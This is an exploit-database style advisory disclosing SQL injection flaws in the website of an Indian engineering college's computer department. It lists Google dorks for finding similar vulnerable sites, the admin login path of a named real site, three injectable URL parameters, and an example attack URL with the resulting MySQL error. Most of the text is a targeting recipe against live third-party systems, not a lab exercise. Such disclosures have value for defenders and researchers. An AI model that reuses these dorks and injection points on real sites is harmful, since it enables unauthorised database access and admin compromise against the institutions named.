facebook facebook twitter rss

Joomla Department of Computer Engineering OmEducation India SQL Injection Vulnerability

Author: KingSkrupellos , Published: 09-11-2018
# Exploit Title : Joomla Department of Computer Engineering OmEducation India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/11/2018
# Vendor Homepage : spectrom16.omeducation.edu.in
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''Design & Developed By Department of Computer Engineering'' site:edu.in
intext:''Design By Computer Department'' site:edu.in
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

spectrom16.omeducation.edu.in/administrator/

#################################################################################################

# SQL Injection Exploit :

/edepartment.php?id=[ID-NUMBER]&&deptid=[SQL Injection]

/facultydetails.php?deptid=[ID-NUMBER]&id=[SQL Injection]

/gallery_detail.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

omeducation.edu.in/edepartment.php?id=3&&deptid=10%27 => [ Proof of Concept ] => archive.is/cQ9oA

#################################################################################################

# SQL Database Error :

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the

right syntax to use near ''10'' && page_type='' order by event_date desc LIMIT 10, 5' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :